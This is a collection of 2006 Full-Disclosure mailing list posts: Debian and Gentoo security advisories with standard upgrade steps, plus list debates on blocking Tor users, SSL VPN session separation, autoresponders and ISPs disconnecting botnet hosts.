dog, it's too dark to read. -- Groucho Marx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: Antw: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fixseveral vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Jun 09, 2006 at 02:37:45PM -0300, Cardoso wrote: > I wonder how much of a daily mail traffic is made of autoresponders and > whitelist-challenge messages. I would not know, since my procmailrc send all those whitelist-challenge messages directly to /dev/null. - -- Rodrigo Barbosa "Quid quid Latine dictum sit, altum viditur" "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFEibRXpdyWzQ5b5ckRAgUzAKCr3WBkqogH/mVHsIDOT+8UFrLZHQCeIe6d Lcw5xF61r5jIqq5+Z3ZeEII= =kPBV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: Antw: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fixseveral vulnerabilities
Yes, he did. Happens all the time, there's no such thing as a "list of seasoned professionals, that know better and don't act like newbies". I wonder how much of a daily mail traffic is made of autoresponders and whitelist-challenge messages. On Fri, 09 Jun 2006 13:37:18 -0400 neil davis <[EMAIL PROTECTED]> wrote: nd> No he didn't. Someone please tell me he didn't... I guess we'll be nd> seeing Rocco's out of office message for a while... nd> nd> On Fri, 2006-04-14 at 16:46 +0200, Rocco Maiullari wrote: nd> > Guten Tag ! nd> > nd> > Leider kann ich Ihre e-mail nicht sofort beantworten, da ich mich bis einschl. 21.04.2006 nicht im Hause befinde. nd> > In dringenden Fällen wenden Sie sich bitte an meinen Kollegen nd> > nd> > Timo Dahlhoff nd> > Tel. : 02506 / 922 - 5266 nd> > e-mail : [EMAIL PROTECTED] nd> > nd> > nd> > Rocco Maiullari nd> > Webmaster nd> > nd> > The Phone House Telecom GmbH nd> > Münsterstr. 109 nd> > 48155 Münster nd> > nd> > Fon: +49 (0) 2506 - 922 5256 nd> > Fax: +49 (0) 2506 - 922 1292 nd> > E-Mail: [EMAIL PROTECTED] nd> > http://www.phonehouse.de nd> > nd> > Senken Sie Ihre Telefonrechnung - mit TalkTalk, unserem neuen Festnetzangebot! Mehr Infos unter: www.talktalk.de nd> > nd> > >>> full-disclosure 04/14/06 16:42 >>> nd> > nd> > -BEGIN PGP SIGNED MESSAGE- nd> > Hash: SHA1 nd> > nd> > - -- nd> > Debian Security Advisory DSA 1034-1[EMAIL PROTECTED] nd> > http://www.debian.org/security/ Moritz Muehlenhoff nd> > April 14th, 2006http://www.debian.org/security/faq nd> > - -- nd> > nd> > Package: horde2 nd> > Vulnerability : several nd> > Problem-Type : remote nd> > Debian-specific: no nd> > CVE ID : CVE-2006-1260 CVE-2006-1491 nd> > nd> > Several remote vulnerabilities have been discovered in the Horde web nd> > application framework, which may lead to the execution of arbitrary nd> > web script code. The Common Vulnerabilities and Exposures project nd> > identifies the following problems: nd> > nd> > CVE-2006-1260 nd> > nd> > Null characters in the URL parameter bypass a sanity check, which nd> > allowed remote attackers to read arbitrary files, which allowed nd> > information disclosure. nd> > nd> > CVE-2006-1491 nd> > nd> > User input in the help viewer was passed unsanitised to the eval() nd> > function, which allowed injection of arbitrary web code. nd> > nd> > nd> > The old stable distribution (woody) doesn't contain horde2 packages. nd> > nd> > For the stable distribution (sarge) these problems have been fixed in nd> > version 2.2.8-1sarge2. nd> > nd> > The unstable distribution (sid) does no longer contain horde2 packages. nd> > nd> > We recommend that you upgrade your horde2 package. nd> > nd> > nd> > Upgrade Instructions nd> > - nd> > nd> > wget url nd> > will fetch the file for you nd> > dpkg -i file.deb nd> > will install the referenced file. nd> > nd> > If you are using the apt-get package manager, use the line for nd> > sources.list as given below: nd> > nd> > apt-get update nd> > will update the internal database nd> > apt-get upgrade nd> > will install corrected packages nd> > nd> > You may use an automated update by adding the resources from the nd> > footer to the proper configuration. nd> > nd> > nd> > Debian GNU/Linux 3.1 alias sarge nd> > - nd> > nd> > Source archives: nd> > nd> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc nd> > Size/MD5 checksum: 575 acf3f1924f04e2faddfd06ba9b01820e nd> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz nd> > Size/MD5 checksum:39504 fb338c016b70e69fa4b867fa116b86dc nd> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz nd> > Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44 nd> > nd> > Architecture independent components: nd> > nd> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb nd> > Size/MD5 checksum: 721398 35fa1bf8bf8b4f2be1076501b984367a nd> > nd> > nd> > These files will probably be moved into the stable distribution on nd> > its next update. nd> > nd> > - - nd> > For apt-get: deb http://security.debian.org/ stable/updates main nd> > For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main nd> > Mailing list: debian-security-announce@lists.debian.org nd> > Package info: `apt-cache show ' and http://packages.debian.org/ nd> > -BEGIN PGP SIGNATURE- nd> > Version: GnuPG v1.4.3 (GNU/Linux) nd> > nd> > iD8DBQFEP7SJX
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
On 6/9/06, Cardoso <[EMAIL PROTECTED]> wrote: Most websites rely on cookies, sessions and javascript. If a user can't live with that, I'm very sorry but there's nothing I can do. Actually, no, most websites don't. I use a deny by default cookie policy, and NoScript, and nearly every single website I visit works. I need to enable session cookies when I'm buying something online, but JavaScript is rare that I ever need to enable it for a site. Same about corporate networks where people way high on the food chain demand full access, no firewall control or even transparent filtering. If you have that kind of problem where you work, you need to work on more education and security awareness. Where I am, we force all outbound traffic through a proxy, and everyone including the oh so precious C level goes through it. Mike ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: Antw: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fixseveral vulnerabilities
No he didn't. Someone please tell me he didn't... I guess we'll be seeing Rocco's out of office message for a while... On Fri, 2006-04-14 at 16:46 +0200, Rocco Maiullari wrote: > Guten Tag ! > > Leider kann ich Ihre e-mail nicht sofort beantworten, da ich mich bis > einschl. 21.04.2006 nicht im Hause befinde. > In dringenden Fällen wenden Sie sich bitte an meinen Kollegen > > Timo Dahlhoff > Tel. : 02506 / 922 - 5266 > e-mail : [EMAIL PROTECTED] > > > Rocco Maiullari > Webmaster > > The Phone House Telecom GmbH > Münsterstr. 109 > 48155 Münster > > Fon: +49 (0) 2506 - 922 5256 > Fax: +49 (0) 2506 - 922 1292 > E-Mail: [EMAIL PROTECTED] > http://www.phonehouse.de > > Senken Sie Ihre Telefonrechnung - mit TalkTalk, unserem neuen > Festnetzangebot! Mehr Infos unter: www.talktalk.de > > >>> full-disclosure 04/14/06 16:42 >>> > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > - -- > Debian Security Advisory DSA 1034-1[EMAIL PROTECTED] > http://www.debian.org/security/ Moritz Muehlenhoff > April 14th, 2006http://www.debian.org/security/faq > - -- > > Package: horde2 > Vulnerability : several > Problem-Type : remote > Debian-specific: no > CVE ID : CVE-2006-1260 CVE-2006-1491 > > Several remote vulnerabilities have been discovered in the Horde web > application framework, which may lead to the execution of arbitrary > web script code. The Common Vulnerabilities and Exposures project > identifies the following problems: > > CVE-2006-1260 > > Null characters in the URL parameter bypass a sanity check, which > allowed remote attackers to read arbitrary files, which allowed > information disclosure. > > CVE-2006-1491 > > User input in the help viewer was passed unsanitised to the eval() > function, which allowed injection of arbitrary web code. > > > The old stable distribution (woody) doesn't contain horde2 packages. > > For the stable distribution (sarge) these problems have been fixed in > version 2.2.8-1sarge2. > > The unstable distribution (sid) does no longer contain horde2 packages. > > We recommend that you upgrade your horde2 package. > > > Upgrade Instructions > - > > wget url > will fetch the file for you > dpkg -i file.deb > will install the referenced file. > > If you are using the apt-get package manager, use the line for > sources.list as given below: > > apt-get update > will update the internal database > apt-get upgrade > will install corrected packages > > You may use an automated update by adding the resources from the > footer to the proper configuration. > > > Debian GNU/Linux 3.1 alias sarge > - > > Source archives: > > > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc > Size/MD5 checksum: 575 acf3f1924f04e2faddfd06ba9b01820e > > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz > Size/MD5 checksum:39504 fb338c016b70e69fa4b867fa116b86dc > > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz > Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44 > > Architecture independent components: > > > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb > Size/MD5 checksum: 721398 35fa1bf8bf8b4f2be1076501b984367a > > > These files will probably be moved into the stable distribution on > its next update. > > - > - > For apt-get: deb http://security.debian.org/ stable/updates main > For dpkg-ftp: ftp://security.debian.org/debian-security > dists/stable/updates/main > Mailing list: debian-security-announce@lists.debian.org > Package info: `apt-cache show ' and http://packages.debian.org/ > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.3 (GNU/Linux) > > iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn > nrfwvObZjSThW+pXcD8NI38= > =BIdm > -END PGP SIGNATURE- > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] blue security folds
> While I agree (mostly), getting the ISPs to do what you suggest will > never happen. If I, Joe Clueless User, have a bot running on my PC > spamming half the world, and my ISP notices this and shuts me off, what > will I do? Most people would call the ISP tech support and say "my web doesn't work any more". At that point they could be informed that they are part of a botnet and need to reinstall their OS, your personal information is possibly comprimised, call us when you are done and we'll switch you back on. I used to co-locate a server in an ISP and it got pwned. The ISP shut my port off. I called, and he told me what was going on, I came down, swapped out the box with a properly secured one(I was inexperienced at the time), and was back up in no time. > Assuming I'm like the majority of users and either a) don't know, or You'd know when your port got shut down and called tech support because they'd tell you. > b) don't care what they're talking about, You'd care if they cut you off. > I'll cancel my account and switch to another ISP (that won't shut me off). If ISP's all did the right thing, you'd get cut off again and again and maybe eventually follow their advice or go without internet until you did. > To do what > you suggest would be for the greater good of the whole "Internet > community", but would negatively affect $ISP's bottom line. Excess bandwidth usage doesn't? How about all the time spent tracking down complaints and begging to have your ISP pulled out of blacklists because your users' computers are spamming people? This line of reasoning doesn't work for me. It doesn't work for the internet either, as we can all see. ISP's need to start turning ports off for people that are part of botnets. If it kept happening to them, they'd wise up and stop running every attachment they received. -Neil ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
Most websites rely on cookies, sessions and javascript. If a user can't live with that, I'm very sorry but there's nothing I can do. Same about corporate networks where people way high on the food chain demand full access, no firewall control or even transparent filtering. On Fri, 9 Jun 2006 13:56:32 -0300 Rodrigo Barbosa <[EMAIL PROTECTED]> wrote: RB> -BEGIN PGP SIGNED MESSAGE- RB> Hash: SHA1 RB> RB> On Fri, Jun 09, 2006 at 12:33:39PM -0400, Michael Holstein wrote: RB> > >Your interpretation of the Internet is a bit distorted. RB> > RB> > We're not talking about authenticated websites here (perhaps I should RB> > have made that more clear), nor are we talking about using TOR, etc. for RB> > malicious purposes. RB> > RB> > For the purpose of this (largely theoretical) argument, I meant RB> > "publicly accessible, non-authenticated websites". RB> RB> Just because a park is a public place doesn't give me the write RB> to, lets say, drive a car over the grass. RB> RB> Even if public places there are rules that should be followed. RB> RB> - -- RB> Rodrigo Barbosa RB> "Quid quid Latine dictum sit, altum viditur" RB> "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns) RB> RB> -BEGIN PGP SIGNATURE- RB> Version: GnuPG v1.4.1 (GNU/Linux) RB> RB> iD8DBQFEiafypdyWzQ5b5ckRAvOQAKCed74EcYcxkphgBWt0yrCtlpe2/wCgvFG3 RB> qg91GcAr7Twpg6hcxJiVQzY= RB> =G/OL RB> -END PGP SIGNATURE- RB> RB> ___ RB> Full-Disclosure - We believe in it. RB> Charter: http://lists.grok.org.uk/full-disclosure-charter.html RB> Hosted and sponsored by Secunia - http://secunia.com/ RB> Allgemeinen Anschulterlaubnis Cardoso <[EMAIL PROTECTED]> - SkypeIn: (11) 3711-2466 / (41) 3941-5299 vida digital: http://www.contraditorium.com site pessoal e blog: http://www.carloscardoso.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Jun 09, 2006 at 12:33:39PM -0400, Michael Holstein wrote: > >Your interpretation of the Internet is a bit distorted. > > We're not talking about authenticated websites here (perhaps I should > have made that more clear), nor are we talking about using TOR, etc. for > malicious purposes. > > For the purpose of this (largely theoretical) argument, I meant > "publicly accessible, non-authenticated websites". Just because a park is a public place doesn't give me the write to, lets say, drive a car over the grass. Even if public places there are rules that should be followed. - -- Rodrigo Barbosa "Quid quid Latine dictum sit, altum viditur" "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFEiafypdyWzQ5b5ckRAvOQAKCed74EcYcxkphgBWt0yrCtlpe2/wCgvFG3 qg91GcAr7Twpg6hcxJiVQzY= =G/OL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
Understood. :-) On 6/9/06, Michael Holstein <[EMAIL PROTECTED]> wrote: > Your interpretation of the Internet is a bit distorted. We're not talking about authenticated websites here (perhaps I should have made that more clear), nor are we talking about using TOR, etc. for malicious purposes. For the purpose of this (largely theoretical) argument, I meant "publicly accessible, non-authenticated websites". -- ME2 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
Your interpretation of the Internet is a bit distorted. We're not talking about authenticated websites here (perhaps I should have made that more clear), nor are we talking about using TOR, etc. for malicious purposes. For the purpose of this (largely theoretical) argument, I meant "publicly accessible, non-authenticated websites". ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
Your interpretation of the Internet is a bit distorted. On 6/9/06, Michael Holstein <[EMAIL PROTECTED]> wrote: If you want to make your website private, don't put it on the Internet. -- ME2 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
But remember your rights stop when the rights of others start. So, if a give admin wants people who use Tor to be blocked from his particular site, it is his right. I might not agree with it, but I'll defend his right to do so. After all, it is his site. If he was to do that (and makes a clear statement that he is doing so), he will be loosing users perhaps, but it is his call. As long as I'm not breaking into anything, there's nothing wrong/illegal with using anonmnity tools to access a public website. If you put something on the public internet for all to see, you can't complain about people trying to avoid your attempts to survail them. What rights do you have over other people's networks and sites ? What rights do you have to circunvect the decisions they made ? If you don't like what the way they are doing things, go somewhere else. No one is forcing you to stop using Tor or being anonymous. Public Internet is just that .. Public. If I can't acccess said site with method #1, I can use method #2. If site says "you're using TOR, go away", I can use $random_proxy in $random_country and accomplish the same thing. If you want to make your website private, don't put it on the Internet. /mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Jun 09, 2006 at 11:47:59AM -0400, Michael Holstein wrote: > >again, redirecting a tor user to a 403 requires you to sit and think up of > >a workaround. perhaps you aren't able to come up with one or you don't > >want to take the time/effort. this means i've effectively deterred you from > >using tor to get to the website. now if you care about the website more > >than your privacy, you'd not use tor. if you cared about privacy more, > >you'd not visit the site. you've been deterred from visiting the site > >anonymously. which means it worked. how many people will spend more > >time in order to visit the site? > > As an avid supporter of TOR (and previous operator of a multi-megabit > exit node), I do this all the time. > > I'm going to be anonymous dammit, and I don't care what the other side > thinks. The harder you try to keep us out, the harder we work to get > around it. This is a technical battle you'll never win, because there > are more idealists that believe in privacy than there are un-clued > admins (and LEO) that think otherwise. I'm sorry Michael, but you are a fanatic, in the worst possible meaning of the word. I too am a defender of privacy. I use lots of privacy plugins on my browser, encrypt e-mails with GPG, and sometimes even use Tor when going to some sites from companies with questionable reputation. I too would fight like mad if the government (any) decided to ban Tor or any other privacy tool. That is nothing wrong with that. But remember your rights stop when the rights of others start. So, if a give admin wants people who use Tor to be blocked from his particular site, it is his right. I might not agree with it, but I'll defend his right to do so. After all, it is his site. If he was to do that (and makes a clear statement that he is doing so), he will be loosing users perhaps, but it is his call. What rights do you have over other people's networks and sites ? What rights do you have to circunvect the decisions they made ? If you don't like what the way they are doing things, go somewhere else. No one is forcing you to stop using Tor or being anonymous. - -- Rodrigo Barbosa "Quid quid Latine dictum sit, altum viditur" "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFEiZtIpdyWzQ5b5ckRAv43AJ9PSILwd+9pXb5U7I3AGfhDcewh0QCgnnFl xUgTA2JbBgcdMd/AW2/EY34= =2RVR -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
again, redirecting a tor user to a 403 requires you to sit and think up of a workaround. perhaps you aren't able to come up with one or you don't want to take the time/effort. this means i've effectively deterred you from using tor to get to the website. now if you care about the website more than your privacy, you'd not use tor. if you cared about privacy more, you'd not visit the site. you've been deterred from visiting the site anonymously. which means it worked. how many people will spend more time in order to visit the site? As an avid supporter of TOR (and previous operator of a multi-megabit exit node), I do this all the time. I'm going to be anonymous dammit, and I don't care what the other side thinks. The harder you try to keep us out, the harder we work to get around it. This is a technical battle you'll never win, because there are more idealists that believe in privacy than there are un-clued admins (and LEO) that think otherwise. /mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
SSL certificates are free. You just have to have enough knowledge to distribute your own CA certificate. For a VPN appliance, this should not be a problem at all, since only your trusted users should be accessing it. Even if you aren't competent enough to figure out how to distribute your own CA certificate, I believe there are such things as wildcard certificates. Great .. setup a SSL vpn, then tell your users it's okay to click "yes" on the "untrusted certificate" popup. Sure, it's trivial to create self-signed certs (or run a CA), but distributing your cert (or the CA cert) to all but a handful of clients is a logistical nightmare. If you're going to be installing stuff, might as well make that a IKE/IPSEC client and do it the right way to begin with. /mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200606-07 ] Vixie Cron: Privilege Escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Vixie Cron: Privilege Escalation Date: June 09, 2006 Bugs: #134194 ID: 200606-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Vixie Cron allows local users to execute programs as root. Background == Vixie Cron is a command scheduler with extended syntax over cron. Affected packages = --- Package / Vulnerable / Unaffected --- 1 sys-process/vixie-cron < 4.1-r9>= 4.1-r9 Description === Roman Veretelnikov discovered that Vixie Cron fails to properly check whether it can drop privileges accordingly if setuid() in do_command.c fails due to a user exceeding assigned resource limits. Impact == Local users can execute code with root privileges by deliberately exceeding their assigned resource limits and then starting a command through Vixie Cron. This requires resource limits to be in place on the machine. Workaround == There is no known workaround at this time. Resolution == All Vixie Cron users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-process/vixie-cron-4.1-r9" References == [ 1 ] CVE-2006-2607 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2607 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200606-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpLzgKPbKpIr.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.
responses inlineOn 6/8/06, Eliah Kagan <[EMAIL PROTECTED]> wrote: On 6/8/06, John Sprocket wrote:> but like all tools it's a double-edged sword and is easy to abuse.> saying "do not bother. you're fighting against privacy, find a better> way" is not solving the problem but obviously avoiding it in the > first place. again the original problem is of identifying a tor user.> a user choosing to use a known community supported utility> to keep their anonymity (or invalidates their ip). it was stated > that you could lex the cached-directory for a blacklist of ips.The problem, in the first place, is that people are hacking thewebsites of others. Saying, "let's block tor so that it will beslightly harder for some hackers to be quite so anonymous while eroding the privacy of thousands of legitimate users" is called**avoiding the problem**. When you do that instead of securing yourservers, you're going to get hacked.you're suggesting there's something wrong with securing your servers, AND categorizing tor users? would doing both not be considered the samething? if you have no choice but to use closed-source or vuln-ridden softwarethere is nothing you can do besides not use it. if you have a client that requires some proprietary software then that satisfies the "no chice".you can also restrict what a user can do to the machine, but if thefunctionality of the application requires certain privileges and an attacker earns those privileges. then they have the potential to act in the contextof the application.let's say we're referring to a web application because that's what toris commonly associated with. a vuln is discovered where you can insert a record of your choice, then said attacker has the ability to modify flow of the application. remember, you don't control the application, and the application has a requirement of certain resources. how would you secure it from being modified by itself? even if it's only just messing with records that belong to it?take note that this is without having access to the code itself. offtopic, but it's a scenario where you can't quite secure the applicationfrom itself.so what is wrong with directing tor users? i prevent you from usinga tool to keep your privacy when there's no reason you need to be visiting the host anonymously in the first place?i'm suggesting that an anonymous user in my scenario would be consideredan illegitimate user. no reason a user should require their privacy to use a service that i provide. > so redirecting them to a page saying that says "anonymous users> not allowed" or denying a user from running ssh over tor makes > sense to me because it's my equipment after all, and i'd want to know who's> using tor and who isn't.You could require that I give you my social security number and run acredit check on me to view your site, too. You could give me a page saying that I was not allowed to access the site if I didn't agree tothat. But that is very far from saying that it would make sense foryou to do so. It wouldn't. It is legal for you to act destructively to people at large wishing their privacy to be respected, and to your ownusers specifically, but that doesn't mean that it is rational ormorally right for you to do so.again, redirecting a tor user to a 403 requires you to sit and think up of a workaround. perhaps you aren't able to come up with one or you don'twant to take the time/effort. this means i've effectively deterred you fromusing tor to get to the website. now if you care about the website more than your privacy, you'd not use tor. if you cared about privacy more,you'd not visit the site. you've been deterred from visiting the siteanonymously. which means it worked. how many people will spend more time in order to visit the site?> suggesting that an admin shouldn't bother, hackers will work > around it is retarded. of course they'll work around it, but> essentially you're raising the bar so someone will have to make> more effort. you can't really secure everything against everybody> (and still keep your usability. the teeter-totter of security), but you > can make it enough of a pain in the ass to deter them from messing with it.And that is why only leet hackers are able to download movies andmusic on the Internet. Because thousands of technical professionals have joined forces to raise the bar and ensure that only people whoreally know what they're doing can do that, and how could thousands oftechnical professionals fail to succeed against millions of noobs?Rght... If what you are saying were really true, that would only add to my argument about how you're handicapping legitimate users while doingnothing against hackers.my statement is to consider a tor user illegitimate. again, no reasonsomeone should really need to keep their anonymity when visiting a site that i host. someone with access to a proxy or a botnet of spybotswill then have the ability to visit their website and keep their "privacy".but most who don't will just use tor.how man
Re: [Full-disclosure] SSL VPNs and security
> >Set up a wildcard record, *.webvpn.example.org, pointing to the device. > >The device then maps all internal domain names or IP addresses to a > >unique hostname, such as: internalhost.webvpn.example.org, or > >192-168-0-1.webvpn.example.org, etc. > > This has the side effect of making procurement of the SSL certificates > *very* expensive. SSL certificates are free. You just have to have enough knowledge to distribute your own CA certificate. For a VPN appliance, this should not be a problem at all, since only your trusted users should be accessing it. Even if you aren't competent enough to figure out how to distribute your own CA certificate, I believe there are such things as wildcard certificates. tim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
> That depends on whether the solution tries to solve single-sign-on > problems as well. If the vendor is trying to handle SSO in such an > environment, then they are probably using domain cookies. The > problems are exactly the same as the ones Michal listed, plus some > additional ones specific to domain cookies. Right, that does make it difficult. There's probably work arounds, but they may be browser-specific. Wildcard cookies, cookies set to other origins, or somehow setting document.domain back to the base domain after the initial page load might help, but some would probably present the same problem. The web was never designed for complex application development. At least, web standards aren't. Use a real VPN. cheers, tim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
Set up a wildcard record, *.webvpn.example.org, pointing to the device. The device then maps all internal domain names or IP addresses to a unique hostname, such as: internalhost.webvpn.example.org, or 192-168-0-1.webvpn.example.org, etc. This has the side effect of making procurement of the SSL certificates *very* expensive. /mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: SSL VPNs and security
On 8 Jun 2006 at 22:48, Michal Zalewski wrote: > "Web VPN" or "SSL VPN" is a term used to denote methods for accessing > company's internal applications with a bare WWW browser, with the use of > browser-based SSO authentication and SSL tunneling. As opposed to IPSec, > no additional software or configuration is required, and hence, corporate > users can use pretty much any computer they can put their hands on. > > - Application cookies set by other applications. If passed to the > browser (as some SSL VPNs do), these cookies are separated by the use > of "path" parameter alone, which does not necessarily establish a > browser security domain boundary. This is equivalent to the attacker > obtaining user credentials to these applications. > Yes, the path field (in Set-Cookie) doesn't buy you much, see a detailed discussion in "Path Insecurity": http://www.webappsec.org/lists/websecurity/archive/2006-03/msg0.html -Amit ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
On 6/9/06, Tim <[EMAIL PROTECTED]> wrote: Set up a wildcard record, *.webvpn.example.org, pointing to the device. The device then maps all internal domain names or IP addresses to a unique hostname, such as: internalhost.webvpn.example.org, or 192-168-0-1.webvpn.example.org, etc. Wouldn't this properly segment different internal sites, such that an XSS in one wouldn't impact the other? If so, pay attention all SSL VPN vendors: it is your free idea for the week. That depends on whether the solution tries to solve single-sign-on problems as well. If the vendor is trying to handle SSO in such an environment, then they are probably using domain cookies. The problems are exactly the same as the ones Michal listed, plus some additional ones specific to domain cookies. - Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
Hello MZ, I think SSL VPNs are a pretty lame idea in the first place, but for the specific problem you bring up, would the following design work around this? Set up a wildcard record, *.webvpn.example.org, pointing to the device. The device then maps all internal domain names or IP addresses to a unique hostname, such as: internalhost.webvpn.example.org, or 192-168-0-1.webvpn.example.org, etc. Wouldn't this properly segment different internal sites, such that an XSS in one wouldn't impact the other? If so, pay attention all SSL VPN vendors: it is your free idea for the week. tim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is your security 6/6/6 ready?
I am wondering if NetDev is the same guy who claimed he was going to summon a UFO to Vegas last year. Or at the least that Crossover guy. I see a computer, Keys, disks, code. I see a hole, a leak, a hack, a 0-day. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Want to test this desktop barrier? (Unauthorized offer) 0day protection
